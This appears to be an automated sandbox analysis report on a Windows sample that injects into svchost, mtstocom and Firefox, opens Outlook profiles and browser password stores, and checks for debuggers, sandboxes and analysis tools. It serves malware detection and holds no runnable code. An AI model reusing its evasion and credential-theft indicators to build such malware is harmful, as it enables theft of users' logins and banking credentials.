Source: mtstocom.exe, 00000008.00000002.3568272016.0000000003712000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3568272016.00000000036EE000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000003.3061718828.00000000036E2000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3568272016.00000000036E2000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000003.3061602047.00000000036C2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: smQoKNkwB7.exe	Virustotal: Detection: 61%
Source: smQoKNkwB7.exe	ReversingLabs: Detection: 73%

Source: unknown	Process created: C:\Users\user\Desktop\smQoKNkwB7.exe "C:\Users\user\Desktop\smQoKNkwB7.exe"
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\smQoKNkwB7.exe"
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Process created: C:\Windows\SysWOW64\mtstocom.exe "C:\Windows\SysWOW64\mtstocom.exe"
Source: C:\Windows\SysWOW64\mtstocom.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\smQoKNkwB7.exe"	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Process created: C:\Windows\SysWOW64\mtstocom.exe "C:\Windows\SysWOW64\mtstocom.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mtstocom.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mtstocom.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: smQoKNkwB7.exe

Static file information: File size 1244160 > 1048576

Source: smQoKNkwB7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: smQoKNkwB7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: smQoKNkwB7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: smQoKNkwB7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: smQoKNkwB7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: smQoKNkwB7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: smQoKNkwB7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mtstocom.pdb source: svchost.exe, 00000002.00000003.2848443938.0000000002E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2848113543.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, wjIagcdbKdk.exe, 00000007.00000003.2958456910.000000000122F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wjIagcdbKdk.exe, 00000007.00000000.2800546712.000000000065E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: smQoKNkwB7.exe, 00000000.00000003.2344014165.0000000003560000.00000004.00001000.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000003.2343268774.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2890160595.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2783936590.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2785513325.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2890160595.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3569614452.0000000005260000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000003.2889610490.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000003.2891695593.00000000050AB000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3569614452.00000000053FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: smQoKNkwB7.exe, 00000000.00000003.2344014165.0000000003560000.00000004.00001000.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000003.2343268774.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2890160595.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2783936590.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2785513325.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2890160595.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, mtstocom.exe, 00000008.00000002.3569614452.0000000005260000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000003.2889610490.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000003.2891695593.00000000050AB000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3569614452.00000000053FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mtstocom.pdbGCTL source: svchost.exe, 00000002.00000003.2848443938.0000000002E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2848113543.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, wjIagcdbKdk.exe, 00000007.00000003.2958456910.000000000122F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: wjIagcdbKdk.exe, 00000007.00000002.3578843174.000000000717C000.00000004.80000000.00040000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3568272016.0000000003666000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3570258278.000000000588C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3169815403.000000001840C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: wjIagcdbKdk.exe, 00000007.00000002.3578843174.000000000717C000.00000004.80000000.00040000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3568272016.0000000003666000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3570258278.000000000588C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3169815403.000000001840C000.00000004.80000000.00040000.00000000.sdmp

Source: smQoKNkwB7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: smQoKNkwB7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: smQoKNkwB7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: smQoKNkwB7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: smQoKNkwB7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001E42DE

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00200A76 push ecx; ret	0_2_00200A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A833 push ebp; iretd	2_2_0041A851
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414093 pushfd ; ret	2_2_00414099
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004180A6 push ds; retf	2_2_004180A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418168 push ecx; iretd	2_2_00418169
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A981 push eax; iretd	2_2_0041A9A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417A5E push esi; retf 4925h	2_2_00417A91
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401AFB push ebp; retf	2_2_00401B02
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041928F push DF2C003Dh; retf	2_2_00419295
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004014C0 push 051A0F98h; retf	2_2_00401638
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411C94 push ebx; ret	2_2_00411C95
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042DD43 push edi; retn 6791h	2_2_0042DE83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041AD54 pushad ; ret	2_2_0041AE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004035D0 push eax; ret	2_2_004035D2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401596 push 051A0F98h; retf	2_2_00401638
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041AE58 pushad ; ret	2_2_0041AE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414797 pushfd ; retf	2_2_004147E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350225F pushad ; ret	2_2_035027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035027FA pushad ; ret	2_2_035027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx	2_2_035309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350283D push eax; iretd	2_2_03502858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350135E push eax; iretd	2_2_03501369
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057C3533 push ebx; ret	7_2_057C3534
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057D0D15 push esi; ret	7_2_057D0D16
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057CC5F3 pushad ; ret	7_2_057CC732
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057D0E56 push ebp; retf	7_2_057D0E57
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057CC6F7 pushad ; ret	7_2_057CC732
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057C9945 push ds; retf	7_2_057C9946
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057C7032 push ebx; retf	7_2_057C703C
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057C702F push ebx; retf	7_2_057C703C
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057CC0D2 push ebp; iretd	7_2_057CC0F0

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_001FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_001FF98E
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00271C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00271C41

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-96736

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	API/Special instruction interceptor: Address: D68014
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: smQoKNkwB7.exe, 00000000.00000003.2324011660.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000003.2323201415.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000002.2345338130.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000003.2323792273.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000003.2324196609.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000003.2323392780.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000003.2322897405.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000003.2330931364.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: FIDDLER.EXEQ

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0357096E rdtsc

2_2_0357096E

Source: C:\Windows\SysWOW64\mtstocom.exe

Window / User API: threadDelayed 9748

Jump to behavior

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	API coverage: 4.3 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\mtstocom.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\mtstocom.exe TID: 516	Thread sleep count: 224 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe TID: 516	Thread sleep time: -448000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe TID: 516	Thread sleep count: 9748 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe TID: 516	Thread sleep time: -19496000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\mtstocom.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mtstocom.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0024DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0024DBBE
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0021C2A2 FindFirstFileExW,	0_2_0021C2A2
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_002568EE FindFirstFileW,FindClose,	0_2_002568EE
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0025698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0025698F
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0024D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0024D076
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0024D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0024D3A9
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00259642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00259642
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0025979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0025979D
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00259B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00259B2B
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00255C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00255C97
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032EC4D0 FindFirstFileW,FindNextFileW,FindClose,	8_2_032EC4D0

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001E42DE

Source: 04EL04J45.8.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 04EL04J45.8.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 04EL04J45.8.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 04EL04J45.8.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: firefox.exe, 00000009.00000002.3171332584.000001459846C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA'
Source: 04EL04J45.8.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 04EL04J45.8.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 04EL04J45.8.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 04EL04J45.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 04EL04J45.8.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 04EL04J45.8.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 04EL04J45.8.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 04EL04J45.8.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: 04EL04J45.8.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 04EL04J45.8.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 04EL04J45.8.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 04EL04J45.8.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 04EL04J45.8.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 04EL04J45.8.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 04EL04J45.8.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: wjIagcdbKdk.exe, 00000007.00000002.3568679639.000000000122E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnz
Source: 04EL04J45.8.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 04EL04J45.8.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 04EL04J45.8.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 04EL04J45.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 04EL04J45.8.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 04EL04J45.8.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 04EL04J45.8.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 04EL04J45.8.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 04EL04J45.8.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 04EL04J45.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: mtstocom.exe, 00000008.00000002.3568272016.0000000003666000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
Source: 04EL04J45.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 04EL04J45.8.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0357096E rdtsc

2_2_0357096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004179E3 LdrLoadDll,

2_2_004179E3

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0025EAA2 BlockInput,

0_2_0025EAA2

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_00212622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00212622

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001E42DE

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00204CE8 mov eax, dword ptr fs:[00000030h]	0_2_00204CE8
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00D682E0 mov eax, dword ptr fs:[00000030h]	0_2_00D682E0
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00D68280 mov eax, dword ptr fs:[00000030h]	0_2_00D68280
